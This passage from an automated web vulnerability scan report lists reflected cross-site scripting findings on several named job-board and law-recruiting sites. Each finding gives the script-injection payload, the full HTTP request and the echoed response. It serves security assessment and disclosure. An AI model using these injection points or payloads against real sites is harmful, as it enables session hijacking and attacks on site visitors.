Confidence:   Certain
Host:   http://www.advertisingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27cd5"><script>alert(1)</script>8bdd32819ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?27cd5"><script>alert(1)</script>8bdd32819ff=1 HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9ft9gv5ubep1dgi1aaiqfl30e1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122002

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.advertisingcrossing.com/?27cd5"><script>alert(1)</script>8bdd32819ff=1">
...[SNIP]...

3.7. http://www.aerospacecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aerospacecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a515"><script>alert(1)</script>e723cb62ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9a515"><script>alert(1)</script>e723cb62ba=1 HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n2un0qqkikvurgvbtcinkgoti7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109453

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.aerospacecrossing.com/?9a515"><script>alert(1)</script>e723cb62ba=1">
...[SNIP]...

3.8. http://www.agriculturalcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.agriculturalcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bfb"><script>alert(1)</script>167dae7435c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?44bfb"><script>alert(1)</script>167dae7435c=1 HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9e2jfijg4pt89plgbsc9greko6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102580

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.agriculturalcrossing.com/?44bfb"><script>alert(1)</script>167dae7435c=1">
...[SNIP]...

3.9. http://www.aharrisonbarnes.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 69719'><script>alert(1)</script>1fd47fb9727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69719\'><script>alert(1)</script>1fd47fb9727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?69719'><script>alert(1)</script>1fd47fb9727=1 HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:06 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=184erm2kcqjgd8l1dqllt4pas5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648528; expires=Sat, 21-Jan-2012 22:22:08 GMT; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%22351ab283c2f7f398da2de6ae4b078e38%22%3Bi%3A1%3Bi%3A1295648528%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%224cf31b74989c1bb6bb9ceee049f98391%22%3Bi%3A1%3Bi%3A1295648529%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91404

<script>
function ValidatorTrim_video(s)
{
var m = s.match(/^\s*(\S+(\s+\S+)*)\s*$/);
return (m == null) ? "" : m[1];
}

function checkEmail_video(strng)
{
   var error = "";
   if (strng == "")

...[SNIP]...
<form name='mrt_sub_form' id='mrt_sub_form' method='POST' action='http://www.aharrisonbarnes.com/index.php?69719\'><script>alert(1)</script>1fd47fb9727=1'>
...[SNIP]...

3.10. http://www.architecturecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.architecturecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65f46"><script>alert(1)</script>4362759dd83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?65f46"><script>alert(1)</script>4362759dd83=1 HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:00 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t0mrcek43plfm1nbkvfa8s5475; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:00 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125437

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.architecturecrossing.com/?65f46"><script>alert(1)</script>4362759dd83=1">
...[SNIP]...

3.11. http://www.auditorcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.auditorcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ed6"><script>alert(1)</script>7d1d61e5318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d4ed6"><script>alert(1)</script>7d1d61e5318=1 HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:00 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ifgrkcdgfg30p4jfql24nnum63; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:00 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125557

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.auditorcrossing.com/?d4ed6"><script>alert(1)</script>7d1d61e5318=1">
...[SNIP]...

3.12. http://www.automotivecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automotivecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d55b"><script>alert(1)</script>709fa56540f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3d55b"><script>alert(1)</script>709fa56540f=1 HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=00ecl9mekiv0j9dgolrk0k94n0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109200

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.automotivecrossing.com/?3d55b"><script>alert(1)</script>709fa56540f=1">
...[SNIP]...

3.13. http://www.aviationcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aviationcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2428f"><script>alert(1)</script>7d6abdc0dd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2428f"><script>alert(1)</script>7d6abdc0dd3=1 HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:10 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lkn6lmhpp9f0snqdnfsosfppg4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123255

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.aviationcrossing.com/?2428f"><script>alert(1)</script>7d6abdc0dd3=1">
...[SNIP]...

3.14. http://www.bcgsearch.com/searchresults.php [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 652f4"><a>5cf13bb15d1 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /searchresults.php?key=OP3V61427652f4"><a>5cf13bb15d1 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=a892eukh7ovae4jmcsqhkevdk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68788

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<link rel="canonical" href="http://www.bcgsearch.com/searchresults.php?key=OP3V61427652f4"><a>5cf13bb15d1" />
...[SNIP]...

3.15. http://www.bcgsearch.com/searchresults.php [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72118"><script>alert(1)</script>118f3550af9 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.php?key=OP3V6142772118"><script>alert(1)</script>118f3550af9 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 20:01:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=rmpahjvejlm5e0t1hefelupr22; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68942

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<link rel="canonical" href="http://www.bcgsearch.com/searchresults.php?key=OP3V6142772118"><script>alert(1)</script>118f3550af9" />
...[SNIP]...

3.16. http://www.bcgsearch.com/searchresults.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b4b"><script>alert(1)</script>65ee7e46726 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.php?c5b4b"><script>alert(1)</script>65ee7e46726=1 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=oe75j7p7vu4b8kk2unodlqkfe7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68865

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...
<link rel="canonical" href="http://www.bcgsearch.com/searchresults.php?c5b4b"><script>alert(1)</script>65ee7e46726=1" />
...[SNIP]...

3.17. http://www.bilingualcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bilingualcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70508"><script>alert(1)</script>8ee9c52dde1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?70508"><script>alert(1)</script>8ee9c52dde1=1 HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=no661p4827foa2ncnmfljmp3l0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:13 GMT
